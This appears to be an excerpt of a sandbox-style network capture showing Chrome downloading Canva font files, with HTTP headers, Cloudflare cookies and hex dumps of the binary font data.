                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC781INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 34 75 70 75 61 56 64 56 77 72 6b 57 58 76 62 30 4a 45 65 71 77 70 55 35 50 53 59 65 48 46 34 32 68 63 75 43 47 6e 64 36 4b 6d 4d 2d 31 37 33 34 36 34 33 36 35 31 2d 31 2e 30 2e 31 2e 31 2d 43 5a 62 64 6a 61 77 33 4b 52 53 41 6d 4a 77 31 7a 58 38 67 6d 33 77 31 69 5f 63 78 4c 64 70 35 75 51 47 66 75 75 30 34 2e 49 43 64 59 78 6e 48 52 78 52 69 32 6a 52 69 4e 4d 4c 57 51 2e 58 53 7a 67 70 54 6d 57 53 55 72 30 66 57 33 66 62 73 44 36 6e 64 73 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=4upuaVdVwrkWXvb0JEeqwpU5PSYeHF42hcuCGnd6KmM-1734643651-1.0.1.1-CZbdjaw3KRSAmJw1zX8gm3w1i_cxLdp5uQGfuu04.ICdYxnHRxRi2jRiNMLWQ.XSzgpTmWSUr0fW3fbsD6ndsQ; path=/; expires=Thu, 19-Dec-24 21:57:31 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC709INData Raw: 77 4f 46 32 00 01 00 00 00 00 a7 7c 00 11 00 00 00 01 e6 20 00 00 a7 16 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b eb 18 1c a0 6c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 9c 68 84 d1 37 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 91 1d 07 a1 7b 0c 81 4b 5b 82 ba 71 06 d5 eb 8e d4 89 70 db 00 fa 80 fa ac 15 ae 73 05 dd b6 75 25 23 4a dd 55 e6 ec 36 88 74 3c 80 e7 46 74 1d 6a 27 54 79 6d f9 9d 9d 95 fd ff ff ff 4b 92 46 8c 6d 3b 74 bb 7f 78 21 08 25 33 4d b3 2a 12 09 16 92 92 4a 0d 25 f4 81 1d 0d 76 28 45 ee 43 b5 c3 98 c1 d4 f0 92 41 3f 37 f1 92 af 5a d9 18 8f b9 db d3 29 da d6 13 8a de 66 94 ee 9b 42 c5 6b df bd d5 5e ea 74 56 79 87 c9 75 8b aa b7 e8 e0 b7 e8 d5 9d 2f 93 78 44 cb 25 3f f0 7e ed 8b c4 82 c7 40 0e
                                                                                                                                                                                                                                                    Data Ascii: wOF2| Dl`nh7>6$: {K[qpsu%#JU6t<Ftj'TymKFm;tx!%3M*J%v(ECA?7Z)fBk^tVyu/xD%?~@
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 7c e7 0f 73 86 59 db 74 e5 f0 10 5e ba fc 20 95 f8 b4 8e 2f d6 1b 95 b0 dd 7f 3a 4d 72 7d 3b f3 3f 32 ae 02 76 3b 65 eb e9 9e 32 d2 08 84 4d 0a 36 71 48 ba 93 c8 fc 53 ae f1 35 b5 16 11 a5 d4 ba 98 65 53 c9 0e 10 c8 a0 33 68 9b 6e e7 aa 30 3d 4e 9f 34 65 d4 29 a8 25 c9 8a 93 b6 d0 8d b2 6b c7 3d d8 f5 44 2d 55 f1 14 1b 58 24 d9 c3 b0 65 f2 c5 1e 75 be 97 f0 63 4b 4e 26 f9 03 73 01 61 ea da e9 f1 f4 5f ba 5e 2f c5 00 2a 83 3b 00 fc 02 e9 f9 b8 d8 7e d0 83 9b 9b 26 ba e9 9a 42 4f 92 a4 04 23 c8 31 b1 b7 6d 98 3f a7 32 7f 19 64 70 55 24 80 50 15 66 ab ca fa 9f 7b 7f 9d 17 5a 0d 33 11 94 88 40 bf 82 92 61 32 4c 28 a1 b5 e2 70 ad 6b e6 4b 14 0a 6c 69 db 9c 58 bd 7a 35 f7 d1 58 7e 16 4f fd 53 12 b3 89 1e 05 16 61 f3 5c df 99 98 5f ff 03 f8 07 7c 70 8c 10 db 19
                                                                                                                                                                                                                                                    Data Ascii: |sYt^ /:Mr};?2v;e2M6qHS5eS3hn0=N4e)%k=D-UX$eucKN&sa_^/*;~&BO#1m?2dpU$Pf{Z3@a2L(pkKliXz5X~OSa\_|p
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 49 4e 70 98 21 b9 6b cc d2 eb fe 6c 0e f2 57 0f 83 4e 0e a3 67 f9 6e 7f 20 3f 03 24 b0 90 0d 00 07 73 c9 c4 84 5b 95 ab 54 27 9a d9 32 1f ee 8a f6 b1 cd 89 e9 0e 6c 0d 29 9a cd 79 12 b7 22 f1 a0 cf 36 47 ca 94 79 87 fa 05 8e 00 6f d5 61 d4 f9 6b ef 48 4f e2 4c 4d 12 6a bf 04 65 72 2c 73 28 37 ac db eb de 0f 21 f8 91 3f 84 57 dc 3d 2f 79 3a 4a 92 c0 f3 96 e8 76 6d 0d 8e fe ce 80 d2 8f 61 ba 75 ca 94 8f 6e d8 82 e7 ac db 96 a9 93 75 c1 1b 7b 11 24 f9 b5 dc 4f 11 f4 40 9d 26 27 b0 50 3f 3b 1c 93 7f ed 58 17 88 89 ed 4c 49 4c aa 37 bb e7 72 ba 58 e0 a1 02 0f a1 fd d8 2a b7 3e f2 a7 0f ef 55 70 ff 98 ed 87 3b 26 89 eb 4b f1 a8 f8 de af 4b 15 0c 5c d6 1b 3a 96 be 5d 36 81 51 5c 6b 82 3a 4a 4a 95 b3 bf cc 73 9e 96 50 1c f4 65 00 50 f3 a4 d2 45 bd 09 54 91 c5 ed
                                                                                                                                                                                                                                                    Data Ascii: INp!klWNgn ?$s[T'2l)y"6GyoakHOLMjer,s(7!?W=/y:Jvmaunu{$O@&'P?;XLIL7rX*>Up;&KK\:]6Q\k:JJsPePET
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 98 a0 c9 f3 b3 12 20 1b f0 62 f2 5d da d7 97 68 a8 20 82 c9 06 87 d8 d5 cc 97 39 f8 b1 f7 d5 2c 13 93 04 fa 0c d5 21 de 73 c6 b1 d9 d7 1b 62 b6 ba 9d 9d 45 a2 53 95 09 c5 5c ce 9e 74 8b b9 31 19 4f 24 56 0a f1 d0 8f 68 42 36 23 d3 d8 8e 94 a7 31 1b c1 7b 06 f6 93 0e cb 27 bb 0f 86 b5 bf f2 65 37 94 c9 45 b5 d7 39 34 78 8b 7e dc 4c 0f 99 2d 68 5b 54 11 d8 04 02 0a 40 72 37 d7 1c 4f 45 aa 26 93 9c 15 c5 7d 2f 67 f2 a6 3f 06 2c f7 58 2b d4 b0 59 27 b6 07 7c 4d 51 c0 dd cd 58 80 8e b8 a0 2b 7e 36 7d a8 e3 d1 60 29 5d 49 55 f3 14 d4 61 a4 0e ff e3 65 f0 ad d2 4f 82 7c e9 12 cd ad 21 5c d4 03 d0 ad 56 ef e6 81 41 3e 38 e2 77 8f 5e d7 f5 5a 77 bc 56 82 35 b4 25 7b 2b ca 5e d9 f1 94 be b3 be 6e dd 10 55 7f 38 a4 96 ca 10 45 b9 54 ea 17 b6 a0 d2 9d d5 94 b6 43 56
                                                                                                                                                                                                                                                    Data Ascii: b]h 9,!sbES\t1O$VhB6#1{'e7E94x~L-h[T@r7OE&}/g?,X+Y'|MQX+~6}`)]IUaeO|!\VA>8w^ZwV5%{+^nU8ETCV
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 48 b0 8d 7c 59 6a 8d b7 29 66 12 6d fd 15 a4 8c 3f 4e 8f 1c 75 cd f6 84 b7 6e 2b ad 46 e9 87 65 68 73 5f 73 57 2d 6d b8 ca 13 6c 13 4a 68 ad e2 a9 02 3b 8f 59 b8 d2 86 0c d3 ed bd b5 3d 2c 21 ae 30 c3 6d ab 3b 35 b2 ad b3 94 ee a7 a7 75 6e b4 cc 9d e5 6a 5d df 19 ce 11 59 b7 65 d6 8f b5 c3 51 58 47 cb 7a 20 6d 9f ea ca aa e1 2e 2c e9 b6 18 6c 2d 9f 77 82 56 1f 4d 4e 2f 44 fb 42 4c 43 2d a5 a9 34 5f 82 98 04 a7 3a 73 4e 51 73 5e b1 6a e5 5c f1 bf 1b 58 13 05 70 e5 97 bd ec 63 27 ba 69 3b 32 ef 9f 14 8f 8a de 0e eb 11 bf b5 d1 4a 4b e8 6e 91 d4 a6 4d 47 1a 25 64 09 5e f6 6d b7 69 ee dc ef ab 11 75 7a 25 5e cb c5 c2 7e b3 20 eb 57 2b 27 fe 25 c2 8f 24 e0 80 04 00 c9 00 62 c0 91 04 0c f9 2f 3b 15 df a7 c5 15 df 9f f3 ae d2 7f 96 ab 8b 2a 64 5b 12 16 6a b2 99
                                                                                                                                                                                                                                                    Data Ascii: H|Yj)fm?Nun+Fehs_sW-mlJh;Y=,!0m;5unj]YeQXGz m.,l-wVMN/DBLC-4_:sNQs^j\Xpc'i;2JKnMG%d^miuz%^~ W+'%$b/;*d[j
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 3d 8a 2b f4 ce 69 2e 2f cf 91 7e 50 b4 8a 89 ba ed b0 8e c2 79 21 bc 26 d8 fe 98 5d 82 f9 e4 72 cd 4d 03 c9 3a 75 f2 89 f4 35 23 d8 28 d2 b2 cb 11 27 d8 f3 74 de 55 61 12 a4 79 8a 6b 39 e5 b6 92 ae e1 46 ea 8d 9c 1b 85 34 2b 3b d1 7e 8c 24 25 da 76 33 63 c3 81 97 20 d7 84 4b 94 ee d9 b5 a0 de a1 5c af 18 46 19 93 b1 3d cc d9 72 e4 2d d8 75 11 92 64 c8 fb 25 06 7a bd 62 52 54 e8 30 b1 97 85 93 9c f8 08 71 43 a4 64 99 f2 15 c3 c0 f2 a5 31 e8 32 35 b1 38 d5 d7 8e 16 ea a6 28 29 b2 14 5c 33 48 ec 15 93 a1 4a cf 56 fb 59 39 cd 85 9f 0b 6e 89 76 5f b6 42 c5 10 32 21 8b 0e 1d 78 9b 03 ac 9d c1 11 ba 73 14 5d 33 c0 6c b4 1c 75 06 b6 3b b8 b2 3c 99 9b 00 97 dc 11 eb a1 5c c5 1e c3 cf 5e 31 79 1a 0c ed 70 c8 31 e7 b8 0b 74 d9 5d 71 1e 79 ac 44 31 38 ed 17 47 81 26
                                                                                                                                                                                                                                                    Data Ascii: =+i./~Py!&]rM:u5#('tUayk9F4+;~$%v3c K\F=r-ud%zbRT0qCd1258()\3HJVY9nv_B2!xs]3lu;<\^1yp1t]qyD18G&
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 02 51 e0 00 1b 88 a4 3c e2 4e 4b 17 7a 5c 8a c3 a7 de 76 76 18 d3 59 c9 22 ec 07 6f eb 72 b1 66 f9 3f d6 aa fa 67 68 d2 53 8b da 34 66 3c 8e 13 c7 8d 13 b4 a2 13 fc cc f5 6e be f7 16 3d 8d be 86 dd 83 03 38 82 45 2c e3 02 6e e1 11 f6 c5 21 f8 1e 56 80 d5 4a 09 09 5e 01 0b a2 20 0b 39 e1 24 9c 11 ee 4b a3 d2 23 7d bb f4 5d a2 5b 0c 88 11 31 2d ce c4 73 a2 93 14 20 0d ca ce c9 ae cb ae 5c 9b 5c 87 dc 07 79 41 45 56 7e 95 ce 96 9a 96 25 ff 87 6e 6e 02 51 68 60 48 46 1d a8 d6 aa ac bf 46 44 7a 7a ab 36 0d 1a 2c 17 8e 84 13 b4 bc 23 7c f5 fc ab d8 dd d8 87 43 18 4b cd 6f 3a 10 5f bd db 51 38 29 c4 e0 3b 17 f9 97 3a 4a e7 a4 79 dc 8e 05 ce ff b3 64 51 2a 5d 86 3f 6a 7b ca 9b 25 f9 58 35 7e 28 78 e4 1c 1f 8f ce ff df ff 2e 9e ae e7 b1 d3 0a 1e 7d d1 cc 57 81 83
                                                                                                                                                                                                                                                    Data Ascii: Q<NKz\vvY"orf?ghS4f<n=8E,n!VJ^ 9$K#}][1-s \\yAEV~%nnQh`HFFDzz6,#|CKo:_Q8);:JydQ*]?j{%X5~(x.}W
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: e8 7f 7d 8a 7f b0 50 8f 07 df 90 3c 94 63 f5 0a c0 0b 24 18 0d 64 c0 06 59 30 1c c8 06 6f 90 03 63 80 5c 10 04 e4 86 c9 40 5e 10 0a e4 0d d3 80 7c 20 0c c8 17 a6 03 f9 41 30 90 3f 4c 01 0a 80 84 40 81 30 0b 28 08 12 01 05 c3 6c a0 10 88 06 0a 85 25 40 61 90 14 28 1c e6 01 25 80 48 a0 84 b0 08 28 11 c4 00 25 86 a5 40 49 20 19 50 52 98 0f 94 0c 52 03 25 87 95 40 11 90 0a 28 12 56 00 45 41 5a a0 68 58 0d 14 03 69 80 52 c0 2a a0 94 90 01 28 15 ac 03 4a 0d e9 81 d2 c0 5a a0 b4 90 1b 28 1d ec 02 4a 0f 39 81 32 c0 0e a0 8c 90 05 28 13 6c 02 ca 0c b9 80 b2 c0 4e a0 ac 90 1d 28 1b 6c 00 ca 0e 99 80 72 c0 76 a0 9c 90 17 28 d7 67 f5 9e dc dc 24 ff 95 07 28 ef 2f 1f 50 10 28 3f 1c 02 2a 00 85 81 0a c2 11 a8 50 68 15 86 c3 50 91 d0 2a 0a 47 a1 62 50 14 a8 38 1c 83 4a
                                                                                                                                                                                                                                                    Data Ascii: }P<c$dY0oc\@^| A0?L@0(l%@a(%H(%@I PRR%@(VEAZhXiR*(JZ(J92(lN(lrv(g$(/P(?*PhP*GbP8J
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: e9 d1 9f 8c b9 6d 9c fb de c0 70 2d 90 05 94 99 eb 34 af 48 37 6f 79 6b c4 ea 6b cb c3 ac c8 54 27 f3 e6 9a de 92 36 b4 61 40 ca ca 95 d6 c1 a7 5c 9c 52 36 17 f8 80 6d 32 c4 ed 78 51 83 cc 85 2b 46 ea b4 4f c9 96 01 e9 b1 09 db 93 48 e6 74 60 75 cf 67 dd f4 f4 29 cd ad 9c 44 c8 b9 71 db af ee 3e c5 8d 6d 25 67 63 17 32 38 9a fd 70 b7 8d 20 95 8e 6d a8 3a 03 ec 2e d7 cf b8 19 46 da 13 90 f6 41 cb a6 8b 51 7f a7 d2 53 e8 b3 b7 99 5a b9 12 3a 45 4c 13 e2 a0 a3 af 7d ca 9a c3 46 c6 a0 e0 e0 a8 62 dc 77 c2 0c a8 a5 47 22 d1 eb 90 ea cb dc 6e 4c 64 50 79 cf b3 1b 38 f4 59 6d 7d cc 03 32 b2 ac 54 57 34 47 20 95 97 cb 83 49 36 27 6e 4c b8 05 ac 10 76 dd 82 ea 9b 90 87 85 1d ff 2a 8e 9f 68 49 0f 32 b8 0b 8f bc 04 21 1f a1 90 9f d0 28 40 18 14 24 2c 0a 11 1d 0a 13
                                                                                                                                                                                                                                                    Data Ascii: mp-4H7oykkT'6a@\R6m2xQ+FOHt`ug)Dq>m%gc28p m:.FAQSZ:EL}FbwG"nLdPy8Ym}2TW4G I6'nLv*hI2!(@$,


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    42192.168.2.449788104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-Bold13644182954117137290.33696.33696a29f45c1b554a4c12443b998d21.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 41456
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a277daa41f2-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1768538
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "4971edf7a4a0359f252d44d4647aa2c2"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:12 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: 6zwbK9IbaKWU5tX5wVLOEjftzYSf1kfbzPEpmOuprgsis8i+GOGYw1EuQWlHT3fsa1j9hbtJvWQ=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 79DVBSSJ71YJ23S3
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: kCziPkbTTVdIEMasFfkM0HXtlX5VUKIa
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC791INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 53 67 4a 69 75 58 6e 65 61 75 6a 79 58 50 2e 51 38 4d 36 4f 36 70 4d 33 6c 30 6a 61 4f 62 69 53 6f 75 6c 78 55 32 57 78 56 4a 41 2d 31 37 33 34 36 34 33 36 35 31 2d 31 2e 30 2e 31 2e 31 2d 72 4b 65 46 55 59 76 6c 53 71 36 53 30 50 48 6d 33 7a 6c 38 55 31 31 41 33 71 78 79 6c 4c 62 2e 41 6b 53 65 5a 58 44 39 73 6b 41 6e 53 43 6c 62 65 68 66 7a 45 37 75 50 4f 76 49 5f 42 66 77 67 78 31 67 6a 65 72 35 56 6f 48 76 53 4d 45 4b 65 48 48 59 6e 4f 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=SgJiuXneaujyXP.Q8M6O6pM3l0jaObiSoulxU2WxVJA-1734643651-1.0.1.1-rKeFUYvlSq6S0PHm3zl8U11A3qxylLb.AkSeZXD9skAnSClbehfzE7uPOvI_Bfwgx1gjer5VoHvSMEKeHHYnOw; path=/; expires=Thu, 19-Dec-24 21:57:31 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC699INData Raw: 77 4f 46 32 00 01 00 00 00 00 a1 f0 00 11 00 00 00 01 dd cc 00 00 a1 8a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b ea 44 1c a0 0c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 8e 18 84 c4 75 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 90 4f 07 a1 7b 0c 81 4b 5b 3e b3 71 07 75 c3 a4 3a 2b 07 b9 db 06 50 59 fc 5c 6f bf df 91 30 e5 ae f5 1b 10 ce 0d 09 dd 6f b5 96 1f 70 54 31 76 32 bb 5b 51 8a 6c cd 1b cc fe ff ff ff b7 24 93 18 db 6d c0 dd c6 f3 90 28 6a 88 6a 5a 55 81 10 a1 20 14 20 94 7d 09 0c 26 eb 58 9d 88 c9 93 de 3c c9 2d 3b 53 2a fa 79 3f 82 56 07 2d 72 d2 d0 d2 d2 26 12 f2 8f ed 9c 8a 77 e6 48 6f 6c 83 1e b3 b5 e9 1d 67 b3 82 08 43 33 c8 bd d0 8b 94 2f 3a 02 ad 9c 1d 37 10 57 af 80 05 6b 8f cb 6d ad 03 06 13 c8
                                                                                                                                                                                                                                                    Data Ascii: wOF2DD`nu>6$: O{K[>qu:+PY\o0opT1v2[Ql$m(jjZU }&X<-;S*y?V-r&wHolgC3/:7Wkm
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 9d 12 a7 cf a8 ab 9e d6 6c 62 4e d3 93 06 80 76 80 4d 21 5c ff 83 aa 96 ff 99 5d 55 dd f3 dc 97 f1 c8 38 02 ac 85 82 47 88 42 5c 8c 0b 3b 4f 85 88 82 1f 3a a4 bf bb 06 d5 e9 5c 1a ec 3a 7c d5 88 8c 42 3e ff 3a fd ba 4f 7a 62 83 c8 b2 85 16 58 32 c8 40 31 c4 71 fc 82 f0 39 99 59 a0 a2 9e 2d b7 ff db 35 59 38 fd f8 a6 3f 95 92 02 4f 44 ba 73 e5 80 de b2 bd 02 81 9d f6 df de 2e 63 b7 09 7d 6a ed f5 2d f1 11 ee fd 5c 0a a8 5b 61 04 b1 4d 55 a6 42 22 e9 40 05 40 41 c4 72 15 d5 46 43 32 2b 66 39 d5 c7 93 40 64 73 65 5a b7 74 6c 9f c0 11 b5 41 c1 c7 ed d1 5c fa ca 77 80 f8 42 c0 32 79 0c 85 8c 0b d6 c9 03 97 53 82 68 f5 24 4f f5 24 6b e7 41 74 2a e4 61 69 96 2e 25 80 47 5c 7b df 5d d3 b4 fd 48 1d 00 ab 49 20 8b 71 62 68 cc ac 9e d3 38 ef 9c 5f d3 71 9a a1 da b7
                                                                                                                                                                                                                                                    Data Ascii: lbNvM!\]U8GB\;O:\:|B>:OzbX2@1q9Y-5Y8?ODs.c}j-\[aMUB"@@ArFC2+f9@dseZtlA\wB2ySh$O$kAt*ai.%G\{]HI qbh8_q
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: d0 ee 3a 85 47 a7 33 04 f4 3a 47 c4 a0 0b 24 8c ba 44 61 d2 15 4a b3 ae 51 59 06 1b d4 56 59 73 7b 81 44 08 b0 ac 89 b1 3a ed 82 26 77 3d f2 ca a7 b5 fd 9f bc 14 94 a9 d3 a1 cf 98 25 3b 60 2e 17 cf a4 84 24 18 24 fe 42 44 8a 27 91 a1 20 fb be bf 54 24 3c 60 00 dd 5f 39 82 42 58 11 be 2b e8 78 1c 12 54 7c 19 45 7c 61 81 db 2c 77 e6 67 86 f5 d7 e1 9c 1b 67 af eb ed fd de c1 05 50 f4 05 ca 00 a5 fa a8 f8 a7 34 cf fd 40 3c c8 b9 d2 d2 0b 10 86 e8 30 74 a2 da e3 17 24 fa cb a2 b4 0a 02 d6 c3 53 ea 6b 73 e9 76 26 06 e0 c3 db 28 56 d9 b0 64 e3 c0 ac 53 74 e7 3e 22 1e a8 4d 84 24 75 13 21 30 3d 2b 70 ac 8d ca 61 bc 87 21 82 7d 94 83 58 9b fb 87 65 43 e2 26 0b 24 a6 b2 1f bb b5 46 c6 70 56 40 f3 f0 10 82 69 22 5b 77 3d 46 12 1d 71 42 0d e7 1d 91 a5 b1 47 84 6c 65
                                                                                                                                                                                                                                                    Data Ascii: :G3:G$DaJQYVYs{D:&w=%;`.$$BD' T$<`_9BX+xT|E|a,wggP4@<0t$Sksv&(VdSt>"M$u!0=+pa!}XeC&$FpV@i"[w=FqBGle
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: e9 67 4c dc 35 69 33 0f 34 c9 ee 56 0b bd ec 62 cf 69 b5 9e 0f 0e 54 66 ac d8 d8 c1 ac be 1b df a1 5a eb bc 9c 6e ea 7f f0 d4 95 cb 72 31 8b 37 99 2d 0f 25 d7 96 2b 32 f4 35 83 74 ef ea 13 24 8e d9 11 24 47 9a a8 b8 23 e8 50 4a df 68 f5 43 8b 9d e9 ca cd ac f3 ef ce 82 f5 fa da 2e 9f 00 13 f9 33 b0 8a 5d db 96 0e 9a 6a 7c d1 02 6c 06 41 4c 7f 79 ed 9b 2d 32 74 60 30 b1 91 21 ce 65 f3 c4 08 7f fa d5 21 fb 58 92 44 e5 90 1c c6 7b 55 71 ec 6f 9c ac 57 76 72 30 fe 45 a2 d4 a2 ae 62 ae 64 4c 66 e8 73 07 04 e7 d2 ae 05 06 a0 45 a7 68 f0 65 3a b0 a0 3a 1d 30 c0 d1 33 72 99 e2 53 3e c5 65 0c 3e fd 4d 5c 74 97 ee 10 c1 8d 18 3a 78 0b b3 df cc 0c 37 0e 74 6a 54 11 ac 09 04 2a 00 a9 bd dc 12 90 8b 3f dc ce 4a 57 97 f6 9b 64 9f 05 0c 6f 04 1b da e6 31 35 6c 97 d5 b7
                                                                                                                                                                                                                                                    Data Ascii: gL5i34VbiTfZnr17-%+25t$$G#PJhC.3]j|lALy-2t`0!e!XD{UqoWvr0EbdLfsEhe::03rS>e>M\t:x7tjT*?JWdo15l
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: a8 9c b4 cc a0 0c 65 2a f3 23 0d 69 4b 5a 95 ab 53 47 57 ac 6c 20 ee 69 42 e8 1c d5 d6 5f e3 68 1b ae a9 dd 33 73 01 43 af a0 bb c5 60 12 9f 3d f2 27 2d e0 40 c1 ef 9c dd 1e ae 3f 66 1b b2 98 ec 1d 8f 4a 98 34 3f 02 85 28 5c 0a 7f 9c 3b f4 ed e8 81 f4 00 8a a3 9f 91 7b 3c 8a 0d 45 ac 74 d4 bb 8d 10 b1 a3 02 24 c1 1b f1 59 73 d7 4b 80 9a 9d 4f 7a b3 3f 1e a9 1d b5 26 9e 48 e3 ee 19 60 f4 2a 15 c9 ff 27 d1 32 a9 63 95 96 4f ff 78 30 35 7c 49 f9 1b 73 00 50 89 7b 9d 87 c2 32 75 37 f7 50 2b 7f f7 03 31 75 b2 37 e8 75 6a d0 ec af 6b 1c 4d ba 60 1d 13 0f a2 4b 9c aa 23 84 3d c6 7f a1 74 2d 23 d7 34 9d 05 c4 73 89 47 83 14 63 92 cf 9e e0 0e a4 7f b3 20 ef 36 80 32 de a0 16 0d c5 97 c8 db d8 21 60 af c4 ba c2 8a 3c e5 c9 f5 bc 7c 0b 6e 65 69 7d 73 ad 7a f9 e5 0d
                                                                                                                                                                                                                                                    Data Ascii: e*#iKZSGWl iB_h3sC`='-@?fJ4?(\;{<Et$YsKOz?&H`*'2cOx05|IsP{2u7P+1u7ujkM`K#=t-#4sGc 62!`<|nei}sz
